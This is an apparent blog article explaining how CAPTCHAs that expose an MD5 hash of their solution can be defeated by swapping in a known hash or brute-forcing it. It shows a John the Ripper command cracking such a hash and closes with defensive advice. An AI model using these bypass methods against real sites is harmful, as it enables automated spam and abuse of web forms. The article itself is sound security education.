Cracking weak CAPTCHA implementations

Asking users to prove that they are not a machine by requiring them to recognise words formed by distorted characters, known as a CAPTCHA, has grown in popularity in recent years; so too have the many implementations that can be easily cracked by a bot intent on automating the submission of swathes of forms or spam comments.

One of these easy to crack implementations that I sometimes come across is where the solution to the CAPTCHA is being stored client-side in the form of a hash, which as we'll see, can be easily brute-forced.

Good implementation

When CAPTCHAs are served to users, the user is generally unaware that the CAPTCHA's image (containing the distorted words) is accompanied by some form of reference to the original words that are stored on the server. In most popular implementations, such as reCAPTCHA, the reference is often a unique number or session ID. This is used by the server when the user submits their guess as a means of locating the original words. The usage of this reference means the words aren't exposed to the user.


Poor implementation

There are a number of less effective implementations that I have come across, that instead of using a reference unrelated to the words distorted in the CAPTCHA's image, will instead use a hash (often MD5) of the words. Once the user has submitted their guess then the server compares the precomputed hash that accompanied the CAPTCHA with a hash of the user's guess to see if they match. This then confirms whether the user's guess was correct.

Weaknesses

The technique of validating a CAPTCHA with a hash opens up two possible weaknesses. Firstly, the original word(s) can be derived by brute-forcing the hash, which is remarkably quick given the limited complexity of the words. Secondly, in a few cases you can just replace the hash with your own, then supply the words that you used to create the hash. Below are examples of both of these techniques...

Replacing the hash

Replacing the CAPTCHA's hash with one created from a previous challenge, of which the solution is known, is often the quickest way to circumvent these poorly implemented CAPTCHAs.

Brute-forcing a hash

Creating a hash of every combination of characters used by the CAPTCHA until you produce the same hash as the one exposed by the CAPTCHA (known as brute-forcing) is also effective. It can also be extremely quick provided that the CAPTCHA doesn't use too many different characters. There are many tools/libraries available that can be used for brute-forcing different hashing algorithms, the most popular of which is John the Ripper.

Example

Below is an example of using John the Ripper to quickly brute force the hash exposed by a poor CAPTCHA implementation...
$> echo -n "d30d0f4fc023858d293b80c6abbc6a83" > ~/captcha.txt
$> john -i:CAPTCHA --format:raw-md5 ~/captcha.txt
Loaded 1 password hash (Raw MD5 [32/32])
frcws            (?)
guesses: 1  time: 0:00:00:07 DONE (Mon June 02 13:56:52 2014)  c/s: 350444  trying: frcws

Conclusion

As shown, CAPTCHAs that rely on a hash of the solution offer very little protection against automated form submissions. The best advice is to avoid such implementations and use well tested CAPTCHAs such as Google's reCAPTCHA, or if you're going to roll your own solution then ensure no information, other than the image, is shared with the client that can be used to derive the solution.